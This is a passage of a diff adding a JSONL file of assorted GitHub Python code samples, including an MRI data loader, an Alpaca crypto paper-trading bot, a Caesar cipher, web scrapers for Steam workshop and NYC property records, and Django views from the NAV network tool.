diff --git "a/6310.jsonl" "b/6310.jsonl" new file mode 100644--- /dev/null +++ "b/6310.jsonl" @@ -0,0 +1,629 @@ +{"seq_id":"38789993558","text":"\"\"\"Model builder class.\"\"\"\nfrom subprocess import call\n\nfrom qlearning.simplifier import Simplifier\nfrom utils import *\n\n\nclass ModelBuilder:\n \"\"\"Model builder class using KenLM.\"\"\"\n\n def __init__(self, raw_events):\n \"\"\"Initialize the class.\"\"\"\n self.raw_events = raw_events # event from Recorda\n # self.h_events, self.h_events_str = self.create_hash_events(raw_events)\n self.h_event_count, self.h_event_freq = self.create_hash_events_with_frequency(raw_events)\n\n def trim_newline(self, text):\n \"\"\"Remove empty newline or trailing space.\"\"\"\n return \"\".join([s for s\n in text.strip().splitlines(True)\n if s.strip()])\n\n def create_hash_events(self, raw_events):\n \"\"\"Hash all the events in dict and seq of hash events.\n\n format of dict: [{hashValue1: event1}, ...]\n \"\"\"\n hash_events = {}\n hash_events_str = ''\n simplifier = Simplifier()\n for e in raw_events:\n if e[\"eventType\"] == 'TYPE_WINDOW_STATE_CHANGED':\n h_event = simplifier.hash_event(e)\n hash_events_str += '\\n'\n else:\n sim = simplifier.simplification_event(e)\n h_event = sim[0]\n hash_events[h_event] = sim[1]\n hash_events_str += sim[0] + ' '\n\n hash_events_str = self.trim_newline(hash_events_str)\n # hash_events_str = ' '.join(hash_events_list)\n return [hash_events, hash_events_str]\n\n def create_hash_events_with_frequency(self, raw_events):\n \"\"\"Hash all the events in dict and seq of hash events.\n\n format of dict: {hashValue1: simplified event1, hashValue2: simplified event2}, ...\n \"\"\"\n hash_events = {}\n hash_events_count = {}\n simplifier = Simplifier()\n for e in raw_events:\n if e[\"eventType\"] == 'TYPE_WINDOW_STATE_CHANGED':\n h_event = simplifier.hash_event(e)\n else:\n sim = simplifier.simplification_event(e)\n h_event = sim[0]\n hash_events[h_event] = sim[1]\n if h_event in hash_events_count:\n hash_events_count[h_event] += 1\n else:\n hash_events_count[h_event] = 1\n hash_freq = {k: v/float(len(raw_events)) for k, v in hash_events_count.items()}\n return hash_events_count, hash_freq\n\n def save_hash_events(self, eventstr, filename):\n \"\"\"Hash all event to a file.\"\"\"\n path = '../output/'+filename\n write_string_to_file(eventstr, path)\n\n def create_klm_model_from_events(self, events, filename):\n \"\"\"Parse events to .klm file.\n\n create hash events then save to disk.\n then call cmd to create .arpa\n \"\"\"\n self.h_events, self.h_events_str = self.create_hash_events(events)\n self.save_hash_events(self.h_events_str, filename)\n\n call(['../kenlm/bin/lmplz', '-o', '3', '--discount_fallback'],\n stdin=open('../output/'+filename, 'r'),\n stdout=open('../output/'+filename+'.arpa', 'w'))\n\n def get_score(self, event_seq):\n \"\"\"Get probability of the event sequence.\"\"\"\n return self.model.score(event_seq)\n","repo_name":"codeslord/android-reinforcement-learning-testing","sub_path":"src/qlearning/modelbuilder.py","file_name":"modelbuilder.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"5097719407","text":"from setuptools import setup\n\nlong_description = open(\"README.md\", \"r\").read()\n\nsetup(\n name='latlon3',\n version='1.0.4',\n packages=[''],\n url='https://github.com/search5/latlon',\n license='GNU General Public License v3 (GPLv3)',\n author='Lee persy ji-ho',\n author_email='search5@gmail.com',\n description='Methods for representing geographic coordinates',\n scripts=['__init__.py', 'latlon.py'],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=['six', 'pyproj'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 2.7\",\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Topic :: Scientific/Engineering\"\n ]\n)\n","repo_name":"search5/latlon","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"95"} +{"seq_id":"3607400228","text":"import torch\nimport pathlib\nimport random\nfrom data import transforms\nimport h5py\nfrom torch.utils.data import Dataset\nimport numpy as np\n\nfrom common.subsample import MaskFunc\n\n\n\nclass SliceData(Dataset):\n \"\"\"\n A PyTorch Dataset that provides access to MR image slices.\n \"\"\"\n\n #def __init__(self, root, acc_factor,dataset_type,mask_path): # acc_factor can be passed here and saved as self variable\n def __init__(self, root, acc_factor,dataset_type): # acc_factor can be passed here and saved as self variable\n # List the h5 files in root \n files = list(pathlib.Path(root).iterdir())\n self.examples = []\n self.acc_factor = acc_factor \n self.dataset_type = dataset_type\n # self.key_img = 'img_volus_{}'.format(self.acc_factor)\n # self.key_kspace = 'kspace_volus_{}'.format(self.acc_factor)\n # self.centre_fraction=[0.08]\n self.accelaration = []\n \n #mask_path = os.path.join(mask_path,'mask_{}.npy'.format(acc_factor))\n #self.mask = np.load(mask_path)\n self.accelaration.append(int(self.acc_factor[0]))\n # print(\"self_acc\",self.accelaration)\n for fname in sorted(files):\n # print(\"fname\",fname)\n with h5py.File(fname,'r') as hf:\n fsvol = hf['volfs']\n num_slices = fsvol.shape[2]\n self.examples += [(fname, slice) for slice in range(num_slices)]\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, i):\n # Index the fname and slice using the list created in __init__\n \n fname, slice = self.examples[i] \n # Print statements \n #print (fname,slice)\n \n with h5py.File(fname, 'r') as data:\n\n # input_img = data[self.key_img][:,:,slice]\n # input_kspace = data[self.key_kspace][:,:,slice]\n # input_kspace = npComplexToTorch(input_kspace)\n \n target = data['volfs'][:,:,slice]\n\n kspace_cmplx = np.fft.fftshift(np.fft.fft2(target,norm='ortho'))\n kspace = transforms.to_tensor(kspace_cmplx)\n \n \n mask_func = MaskFunc([0.08], self.accelaration)\n\n seed = tuple(map(ord, str(fname)))\n masked_kspace_square, mask = transforms.apply_mask(kspace.float(), mask_func, seed)\n masked_kspace_np = masked_kspace_square[:,:,0].numpy() + 1j*masked_kspace_square[:,:,1].numpy()\n us_img = np.abs( np.fft.ifft2(masked_kspace_np))\n \n \n \n \n \n \n #uskspace_cmplx = kspace_cmplx * self.mask\n #zf_img = np.abs(np.fft.ifft2(uskspace_cmplx,norm='ortho'))\n \n # if self.dataset_type == 'cardiac':\n # Cardiac dataset should be padded,150 becomes 160. # this can be commented for kirby brain \n # input_kspace is not padded, dont bother, as we are not using it \"\n # print(\"masked_kspace\",masked_kspace_square.shape)\n masked_kspace_square = np.pad(masked_kspace_square,((5,5),(5,5),(0,0)),'constant',constant_values=(0,0))\n # print(\"masked_kspace2\",masked_kspace_square.shape)\n us_img = np.pad(us_img,(5,5),'constant',constant_values=(0,0))\n target = np.pad(target,(5,5),'constant',constant_values=(0,0))\n\n # Print statements\n #print (input.shape,target.shape)\n #return torch.from_numpy(zf_img), torch.from_numpy(target)\n # print(\"fname\",type(fname))\n return us_img, masked_kspace_square , target , str(fname.name) , slice\n \n","repo_name":"amritkumar9595/dualencoder","sub_path":"cardiac/data/mri_data.py","file_name":"mri_data.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"32852101014","text":"import sys\n\nimport cv2\n\nfrom ikalog.scenes.scene import Scene\nfrom ikalog.utils import *\n\n\nclass GameTimerIcon(Scene):\n timer_left = 60\n timer_width = 28\n timer_top = 28\n timer_height = 34\n\n def match_no_cache(self, context):\n frame = context['engine']['frame']\n\n if frame is None:\n return False\n\n return self.mask_timer.match(frame)\n\n def _analyze(self, context):\n pass\n\n def _init_scene(self, debug=False):\n self.mask_timer = IkaMatcher(\n self.timer_left, self.timer_top, self.timer_top, self.timer_height,\n img_file='game_timer_icon.png',\n threshold=0.9,\n orig_threshold=0.35,\n bg_method=matcher.MM_BLACK(visibility=(0, 32)),\n fg_method=matcher.MM_WHITE(visibility=(160, 256)),\n label='timer_icon',\n debug=debug,\n )\n\nif __name__ == \"__main__\":\n GameTimerIcon.main_func()\n","repo_name":"joythegreat/IkaLog","sub_path":"ikalog/scenes/game/timer_icon.py","file_name":"timer_icon.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18603848946","text":"#Define your functions\r\ndef get_drink_type():\r\n res = input('What type of drink would you like \\n[a] Brewed Coffe \\n[b] Mocha \\n[c] Latte \\n')\r\n if res == 'a':\r\n return \"Brewed Coffe\"\r\n elif res == 'b':\r\n return 'Mocha'\r\n elif res == 'c':\r\n return 'Latte'\r\n else:\r\n print_message()\r\n return get_drink_type()\r\n\r\n#Defines cream preferance\r\ndef cream_pref():\r\n res = input('And what kind of milk for your drink? \\n[a] None \\n[b] 2% milk \\n[c] Non-fat milk \\n[d] Soy milk \\n[e] Almond milk \\n')\r\n if res == 'a':\r\n return \"None\"\r\n elif res == 'b':\r\n return '2% milk'\r\n elif res == 'c':\r\n return 'non-fat milk'\r\n elif res == 'd':\r\n return 'Soy milk'\r\n elif res == 'e':\r\n return 'Almond milk'\r\n else:\r\n print_message()\r\n return milk_pref()\r\n\r\n#Error message used to loop selection.\r\ndef print_message():\r\n print(\"I'm sorry, I did not understand your selection. Please enter the corresponding letter for your response.\")\r\n\r\n#Defines available sizes\r\ndef get_size():\r\n res = input('What size drink can I get for you? \\n[a] Small \\n[b] Medium \\n[c] Large \\n')\r\n if res == 'a':\r\n return \"small\"\r\n elif res == 'b':\r\n return 'medium'\r\n elif res == 'c':\r\n return 'large'\r\n else:\r\n print_message()\r\n return get_size()\r\n\r\n#Runs Coffee order\r\ndef coffee_bot():\r\n print(\"Welcome to the cafe!\")\r\n drink_type = get_drink_type()\r\n size = get_size()\r\n cream = cream_pref()\r\n name = input(\"Can i get your name please \\n[]\")\r\n print(\"Alright, that's a \" + size, drink_type + \" with \" + cream)\r\n print(\"Thanks, \" + name + \"! Your drink will be ready shortly.\")\r\n\r\ncoffee_bot()\r\n","repo_name":"JJKOTH/JK_Projects","sub_path":"coffee_bot.py","file_name":"coffee_bot.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"37487533272","text":"from script.metadata import HEADER, WORKSHOP_URL\n\nfrom bs4 import BeautifulSoup\nfrom urllib import request\nimport time\nimport random\nimport os\n\n# url에서 id 추출\ndef ext_id(workshop_url):\n for _ in reversed(workshop_url.split('/')):\n if 'id' in _:\n return _[4:]\n\n# url을 통해서 html 읽어오기\ndef call_html(id):\n with request.urlopen(request.Request(url=WORKSHOP_URL+id, headers=HEADER)) as response:\n return BeautifulSoup(response.read(), 'lxml')\n\n# 모음집 id를 사용하여 모음집에 있는 워크숍 id 불러오기\ndef collect_mod_id(collection_id):\n id_list = []\n\n # 모음집의 구독 목록 부분 불러오기\n for _ in call_html(collection_id).find_all('div', class_='workshopItem'):\n id_list.append(ext_id(_.find('a')['href']))\n\n return id_list\n\n# 가져온 ID를 사용해서 정보 긁어오기\ndef collect_mod_contents(id_list, set_sleep=False):\n mod_dict = {'id':id_list, 'mod':[], 'map':[]}\n \n for id_num in mod_dict['id']:\n # URL을 통해서 html 읽어오기\n workshop_contents = call_html(id_num).find('div', class_='workshopItemDescription')\n \n for _ in workshop_contents.prettify().split('\\n'):\n # MOD NAME\n if 'Workshop ID: ' in _:\n print('Workshop ID: {}'.format(_.split(': ')[1]))\n # MOD ID\n elif 'Mod ID: ' in _:\n print('Mod ID: {}'.format(_.split(': ')[1]))\n mod_dict['mod'].append(_.split(': ')[1])\n # MAP FOLDER\n elif 'Map Folder: ' in _:\n print('Map Folder: {}'.format(_.split(': ')[1]))\n mod_dict['map'].append(_.split(': ')[1])\n\n if set_sleep:\n time.sleep(random.uniform(1, 3))\n\n print('-' * 20)\n\n return mod_dict\n\ndef save_env(mod_dict, env_path='./'):\n if os.path.isfile(env_path+'.env'):\n print('.env 파일이 존재하여 삭제 후 재생성합니다.')\n os.remove(env_path+'.env')\n env_file = open(env_path+'.env', 'w')\n env_file.write('MOD_WORKSHOP_IDS=' + ';'.join(mod_dict['id']) + '\\n\\n')\n env_file.write('# 마지막에 Muldraugh, KY는 꼭 있어야합니다.\\n')\n env_file.write('MOD_NAMES='+ ';'.join(mod_dict['mod']) + '\\n\\n')\n env_file.write('MAP_NAMES='+ ';'.join(mod_dict['map']) + ';Muldraugh, KY' + '\\n')\n env_file.close()","repo_name":"expbox77/PZ-MOD-InFo-Collector","sub_path":"script/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19124985335","text":"\nimport math\nimport threading\nimport time\n\nimport numpy as np\nimport pandas as pd\n\nfrom trade_rl.meta import constants\nfrom trade_rl.meta.data_processors.alpaca_crypto import AlpacaCrypto\nfrom trade_rl.meta.crypto.env_multiple_crypto import generate_action_normalizer\nfrom trade_rl.meta.data_processors._base import time_convert\n\n\nclass AlpacaPaperTradingMultiCrypto:\n def __init__(\n self,\n ticker_list,\n time_interval,\n agent,\n agent_path,\n action_dim,\n api_config,\n tech_indicator_list,\n max_stock=1e2,\n ):\n # load agent\n if agent == \"ppo\":\n from stable_baselines3 import PPO\n\n try:\n # load agent\n self.model = PPO.load(agent_path)\n print(\"Successfully load model\", agent_path)\n except:\n raise ValueError(\"Fail to load agent!\")\n else:\n raise ValueError(\"Agent input is NOT supported yet.\")\n\n # connect to Alpaca trading API\n try:\n self.alpaca = AlpacaCrypto(\n time_interval=time_interval, api_config=api_config)\n print(\"Connected to Alpaca API!\")\n except:\n raise ValueError(\n \"Fail to connect Alpaca. Please check account info and internet connection.\"\n )\n # read trading settings\n self.tech_indicator_list = tech_indicator_list\n self.max_stock = max_stock\n self.previous_candles = 250\n self.lookback = 1\n self.action_dim = action_dim\n self.action_decimals = 2\n self.time_interval = time_interval\n\n # initialize account\n self.stocks = np.asarray([0] * len(ticker_list)) # stocks holding\n self.stocks_cd = np.zeros_like(self.stocks)\n self.cash = None # cash record\n self.stocks_df = pd.DataFrame(\n self.stocks, columns=[\"stocks\"], index=ticker_list\n )\n self.asset_list = []\n self.price = np.asarray([0] * len(ticker_list))\n\n stockUniverse = []\n for stock in ticker_list:\n stock = stock.replace(\"USDT\", \"USD\")\n stockUniverse.append(stock)\n\n self.ticker_list = ticker_list\n self.stockUniverse = stockUniverse\n self.equities = []\n\n def test_latency(self, test_times=10):\n \"\"\"Test API Latency.\"\"\"\n total_time = 0\n for _ in range(test_times):\n time0 = time.time()\n self.get_state()\n time1 = time.time()\n temp_time = time1 - time0\n total_time += temp_time\n latency = total_time / test_times\n print(\"latency for data processing: \", latency)\n return latency\n\n def run(self):\n \"\"\"Start trading.\"\"\"\n orders = self.alpaca.api.list_orders(status=\"open\")\n for order in orders:\n self.alpaca.api.cancel_order(order.id)\n while True:\n print(\"\\n\" + \"#################### NEW CANDLE ####################\")\n print(\"#################### NEW CANDLE ####################\" + \"\\n\")\n\n trade = threading.Thread(target=self.trade)\n trade.start()\n trade.join()\n last_equity = float(self.alpaca.api.get_account().last_equity)\n cur_time = time.time()\n self.equities.append([cur_time, last_equity])\n time.sleep(time_convert(self.time_interval))\n\n def trade(self):\n \"\"\"Async trade function.\n\n Get state.\n Predict action in [-1,1] for each stock.\n Normalize action according to average price of a single stock quantity,\n to take into account the difference in scale of crypto prices.\n\n \"\"\"\n # Get state\n state = self.get_state()\n\n # Get action\n action = self.model.predict(state)[0]\n # action = (action * self.max_stock).astype(float)\n\n print(\"\\n\" + \"ACTION: \", action, \"\\n\")\n # Normalize action\n action_norm_vector = generate_action_normalizer(self.price)\n for i in range(self.action_dim):\n norm_vector_i = action_norm_vector[i]\n action[i] = action[i] * norm_vector_i\n\n print(\"\\n\" + \"NORMALIZED ACTION: \", action, \"\\n\")\n\n self.stocks_cd += 1\n min_action = 10 ** -(self.action_decimals) # stock_cd\n # Sell stock\n for index in np.where(action < -min_action)[0]: # sell_index:\n sell_num_shares = min(self.stocks[index], -action[index])\n\n qty = abs(float(sell_num_shares))\n qty = round(qty, self.action_decimals)\n print(\"SELL, qty:\", qty)\n\n respSO = []\n tSubmitOrder = threading.Thread(\n target=self.submitOrder(\n qty, self.stockUniverse[index], \"sell\", respSO)\n )\n tSubmitOrder.start()\n tSubmitOrder.join()\n # Update cash balance.\n self.cash = float(self.alpaca.api.get_account().cash)\n self.stocks_cd[index] = 0\n # Buy stock\n for index in np.where(action > min_action)[0]: # buy_index:\n tmp_cash = max(self.cash, 0)\n print(\"current cash:\", tmp_cash)\n # Adjusted part to accept decimal places up to two\n buy_num_shares = min(\n tmp_cash / self.price[index], abs(float(action[index]))\n )\n\n qty = abs(float(buy_num_shares))\n qty = round(qty, self.action_decimals)\n print(\"BUY, qty:\", qty)\n\n respSO = []\n tSubmitOrder = threading.Thread(\n target=self.submitOrder(\n qty, self.stockUniverse[index], \"buy\", respSO)\n )\n tSubmitOrder.start()\n tSubmitOrder.join()\n # Update cash balance.\n self.cash = float(self.alpaca.api.get_account().cash)\n self.stocks_cd[index] = 0\n\n print(\"Trade finished\")\n\n def get_state(self):\n \"\"\"Compute state.\n\n State comprises:\n - Cash balance\n - Stock qty held \n - (tech_indicators, price) for each stock for\n a certain number of lookback time steps\n \"\"\"\n # Fetch a window of lookback time steps price & tech.\n print(\"fetching latest candles..\")\n cur_price, cur_tech, _ = self.alpaca.fetch_latest_data(\n ticker_list=self.stockUniverse,\n time_interval=self.time_interval,\n tech_indicator_list=self.tech_indicator_list,\n )\n self.price = cur_price\n\n # Fetch stock qty held.\n positions = self.alpaca.api.list_positions()\n stocks = [0] * len(self.stockUniverse)\n for position in positions:\n ind = self.stockUniverse.index(position.symbol)\n stocks[ind] = abs(int(float(position.qty)))\n stocks = np.asarray(stocks, dtype=float)\n self.stocks = stocks\n\n # Fetch cash balance\n cash = float(self.alpaca.api.get_account().cash)\n self.cash = cash\n\n # Stack cash and stocks\n state = np.hstack((self.cash * constants.CASH_SCALE,\n self.stocks * constants.STOCK_QTY_SCALE))\n normalized_tech = cur_tech * constants.TECH_SCALE\n normalized_price = cur_price * constants.CASH_SCALE\n state = np.hstack(\n (state, normalized_price, normalized_tech)).astype(np.float32)\n\n print(\"\\n\" + \"STATE:\")\n print(state)\n\n return state\n\n def submitOrder(self, qty, stock, side, resp):\n if qty > 0:\n try:\n self.alpaca.api.submit_order(stock, qty, side, \"market\", \"gtc\")\n print(\n \"Market order of | \"\n + str(qty)\n + \" \"\n + stock\n + \" \"\n + side\n + \" | completed.\"\n )\n resp.append(True)\n except Exception as e:\n print(\"ALPACA API ERROR: \", e)\n print(\n \"Order of | \"\n + str(qty)\n + \" \"\n + stock\n + \" \"\n + side\n + \" | did not go through.\"\n )\n resp.append(False)\n else:\n print(\n \"Quantity is 0, order of | \"\n + str(qty)\n + \" \"\n + stock\n + \" \"\n + side\n + \" | not completed.\"\n )\n resp.append(True)\n\n @staticmethod\n def sigmoid_sign(ary, thresh):\n def sigmoid(x):\n return 1 / (1 + np.exp(-x * np.e)) - 0.5\n\n return sigmoid(ary / thresh) * thresh\n","repo_name":"marcellinamichie291/TradeRL","sub_path":"src/trade_rl/meta/crypto/alpaca_paper_trade_multicrypto.py","file_name":"alpaca_paper_trade_multicrypto.py","file_ext":"py","file_size_in_byte":8793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74782070711","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.upload_file, name='upload_file'),\n # path('options/', views.options, name='options'),\n path('task1/',views.task1,name='task1'),\n path('task2/',views.task2,name='task2'),\n path('task3/',views.task3,name='task3'),\n \n\n]","repo_name":"Darshan2104/Kakcho","sub_path":"miniProject/Tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1527110118","text":"class Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n left=0\n right=len(matrix)-1\n boll=False\n while left <= right:\n mid = (left+right)//2\n if matrix[mid][0] > target:\n right = mid-1\n elif matrix[mid][-1] < target:\n left= mid+1\n else:\n boll=True\n break\n left=0\n right=len(matrix[0])-1\n booll=False\n if boll:\n while left<=right:\n mid2 = (left+right)//2\n if matrix[mid][mid2] > target:\n right = mid2-1\n elif matrix[mid][mid2] < target:\n left= mid2 + 1\n else:\n booll=True\n break\n return booll\n \n","repo_name":"kalabYibeltal/competitive-Programming","sub_path":"bootCampWeek-2/searchA2DMatrix.py","file_name":"searchA2DMatrix.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"25728666284","text":"from collections import Counter\nfrom statistics import median\n\n#with open('input-real.txt') as input_file:\nwith open('input.txt') as input_file:\n raw_input = input_file.read()\n\ncrabs = raw_input.strip().split(',')\ncrabs = [int(crab) for crab in crabs]\n\ncrabs_count = Counter(crabs)\n\nmost_common = int(crabs_count.most_common()[0][0])\nm = median(crabs)\nprint(most_common, m)\nmost_common = m\n\nmoves = 0\n\nfor crab in crabs:\n movement = int(crab) - most_common\n moves += abs(movement)\n\n# 459589 is too high\nprint(moves)\n","repo_name":"adrianmoisey/adventofcode","sub_path":"2021/7/main-back.py","file_name":"main-back.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40448763228","text":"# Day 8 Project: Ceasar Cipher\n\nimport art\nimport os\nclear = lambda: os.system('cls')\nclear()\n\nprint(art.logo)\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n\ndef ceasar(text, shift, direction):\n end_text = \"\"\n if direction == 'decode':\n shift *= -1\n for char in text:\n if char in alphabet:\n position = alphabet.index(char)\n new_position = position + shift\n end_text += alphabet[new_position]\n else:\n end_text += char\n print(f\"Here's the {direction}d result: {end_text}\")\n\n\nchoose = ''\nwhile choose != 'no':\n direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\").lower()\n text = input(\"Type your message:\\n\").lower()\n shift = int(input(\"Type the shift number:\\n\"))\n if shift >= 26:\n shift %= 26\n ceasar(text, shift, direction)\n choose = input(\"Type 'yes' if you want to go again. Otherwise type 'no'.\\n\").lower()\nprint(\"Goodbay\")","repo_name":"Matthew1401/100_Days_of_Code","sub_path":"Day-08-CaesarCipher/ceasar-cipher.py","file_name":"ceasar-cipher.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34434345484","text":"from clases import *\n\nprocess = lambda l: list(map(int, l.split()))\n\ndef parse(file):\n with open(file, 'r') as f:\n lines_raw = f.readlines()\n lines = list(map(process, lines_raw))\n\n total_days = lines[0][2]\n\n books = []\n for idx, score in enumerate(lines[1]):\n # info['books'][idx] = score\n book = Book(idx, score)\n books.append(book)\n \n libraries = []\n line_ix = 2\n library_idx = 0\n while line_ix < len(lines):\n if len(lines[line_ix]) == 0:\n break\n _, treg, rate = lines[line_ix]\n\n line_ix += 1\n\n books_idx = lines[line_ix]\n books_ = [books[ix] for ix in books_idx]\n library = Library(library_idx, books_, treg, rate)\n libraries.append(library)\n # info['libraries'][library_idx] = {\n # 'treg': treg,\n # 'rate': rate,\n # 'books': books}\n line_ix += 1\n library_idx += 1\n\n\n return books, libraries, total_days\n\n\n\ndef escribir_resultado(salida, filename='output.txt'):\n output = open(filename, 'w')\n salida_f = list(filter(lambda x: len(x[1]) > 0, salida))\n output.write(f'{len(salida_f)}\\n')\n for library, books in salida_f:\n output.write(f'{library.id} {len(books)}\\n')\n for book in books:\n output.write(str(book.id) + ' ')\n output.write('\\n')\n\n output.close()\n\n\nif __name__ == '__main__':\n d = parse('input_data/b_read_on.txt')","repo_name":"naxvm/HashCode2020-HABERLAS","sub_path":"parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2304522807","text":"import time\r\nimport pandas as pd\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n\r\n## open acris with selenium\r\ndriver = webdriver.Chrome()\r\ndriver.get(\"https://a836-acris.nyc.gov/CP/LookUp/Index\")\r\nassert \"Automated\" in driver.title\r\n\r\n## open CSV\r\ncompletedDF = pd.read_csv('LL24Completed.csv')\r\n\r\n## add empty BBL Column\r\nbbl = \"\"\r\ncompletedDF['BBL'] = bbl\r\n\r\n## iterate over each row and find BBL number with address\r\nfor index, row in completedDF.iterrows():\r\n dfBorough = row['Borough']\r\n dfAddress = row['Address']\r\n \r\n if isinstance(dfBorough, str):\r\n print(dfBorough)\r\n\r\n if isinstance(dfAddress, str):\r\n splitAddress = dfAddress.split()\r\n dfStreetNum = splitAddress[0]\r\n dfStreetName = dfAddress.replace(dfStreetNum, '')\r\n print(dfStreetNum)\r\n print(dfStreetName)\r\n \r\n ## input borough\r\n borough = driver.find_element_by_name(\"select_borough\")\r\n borough.send_keys(dfBorough[0])\r\n borough.send_keys(Keys.RETURN)\r\n \r\n ## input street Num\r\n streetNum = driver.find_element_by_name(\"text_street_number\")\r\n streetNum.clear()\r\n streetNum.send_keys(dfStreetNum)\r\n \r\n ## input street Name\r\n streetName = driver.find_element_by_name(\"text_street_name\")\r\n streetName.clear()\r\n streetName.send_keys(dfStreetName)\r\n \r\n submit22 = driver.find_element_by_name(\"submit22\")\r\n submit22.submit()\r\n \r\n time.sleep(1)\r\n \r\n block = driver.find_element_by_name(\"text_block\")\r\n lot = driver.find_element_by_name(\"text_lot\")\r\n \r\n blockNum = block.get_attribute(\"value\")\r\n lotNum = lot.get_attribute(\"value\")\r\n \r\n boroughNum = ''\r\n if dfBorough == 'Manhattan':\r\n boroughNum = '1'\r\n elif dfBorough == 'Bronx':\r\n boroughNum = '2'\r\n elif dfBorough == 'Brooklyn':\r\n boroughNum = '3'\r\n elif dfBorough == 'Queens':\r\n boroughNum = '4'\r\n elif dfBorough == 'Staten Island':\r\n boroughNum = '5'\r\n\r\n bblNum = ''\r\n bblNum = boroughNum + blockNum + lotNum\r\n print(bblNum)\r\n\r\n completedDF.loc[index, 'BBL'] = bblNum\r\n row['BBL'] = bblNum\r\n\r\ncompletedDF.to_csv('LL24Completed_bbl.csv')\r\n\r\n##driver.close()\r\n","repo_name":"veev/schoolofdata2020","sub_path":"python-analysis-cleaning/bblTest.py","file_name":"bblTest.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"18701006233","text":"from datetime import datetime\nimport json\nimport logging\nfrom operator import attrgetter\n\nfrom django.http import (\n HttpResponseForbidden,\n HttpResponseRedirect,\n HttpResponse,\n JsonResponse,\n)\nfrom django.views.decorators.http import require_POST\nfrom django.views.decorators.debug import sensitive_variables, sensitive_post_parameters\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\nfrom django.utils.http import urlquote\n\nfrom nav.auditlog.models import LogEntry\nfrom nav.django.utils import get_account\nfrom nav.models.profiles import NavbarLink, AccountDashboard, AccountNavlet\nfrom nav.web.auth import ACCOUNT_ID_VAR\nfrom nav.web.auth import logout as auth_logout\nfrom nav.web import ldapauth, auth\nfrom nav.web.utils import require_param\nfrom nav.web.webfront.utils import quick_read, tool_list\nfrom nav.web.webfront.forms import (\n LoginForm,\n NavbarLinkFormSet,\n ChangePasswordForm,\n ColumnsForm,\n)\nfrom nav.web.navlets import list_navlets, can_modify_navlet\nfrom nav.web.message import new_message, Messages\nfrom nav.web.webfront import (\n get_widget_columns,\n find_dashboard,\n WELCOME_ANONYMOUS_PATH,\n WELCOME_REGISTERED_PATH,\n)\n\n_logger = logging.getLogger('nav.web.tools')\n\n\ndef index(request, did=None):\n \"\"\"Controller for main page.\"\"\"\n # Read files that will be displayed on front page\n if request.account.is_default_account():\n welcome = quick_read(WELCOME_ANONYMOUS_PATH)\n else:\n welcome = quick_read(WELCOME_REGISTERED_PATH)\n\n dashboard = find_dashboard(request.account, did)\n dashboards = AccountDashboard.objects.filter(account=request.account)\n\n context = {\n 'navpath': [('Home', '/')],\n 'date_now': datetime.today(),\n 'welcome': welcome,\n 'dashboard': dashboard,\n 'dashboards': dashboards,\n 'navlets': list_navlets(),\n 'title': u'NAV - {}'.format(dashboard.name),\n }\n\n if dashboards.count() > 1:\n dashboard_ids = [d.pk for d in dashboards]\n current_index = dashboard_ids.index(dashboard.pk)\n previous_index = current_index - 1\n next_index = current_index + 1\n if current_index == len(dashboard_ids) - 1:\n next_index = 0\n context.update(\n {\n 'previous_dashboard': dashboards.get(pk=dashboard_ids[previous_index]),\n 'next_dashboard': dashboards.get(pk=dashboard_ids[next_index]),\n }\n )\n\n return render(request, 'webfront/index.html', context)\n\n\ndef export_dashboard(request, did):\n \"\"\"Export dashboard as JSON.\"\"\"\n dashboard = 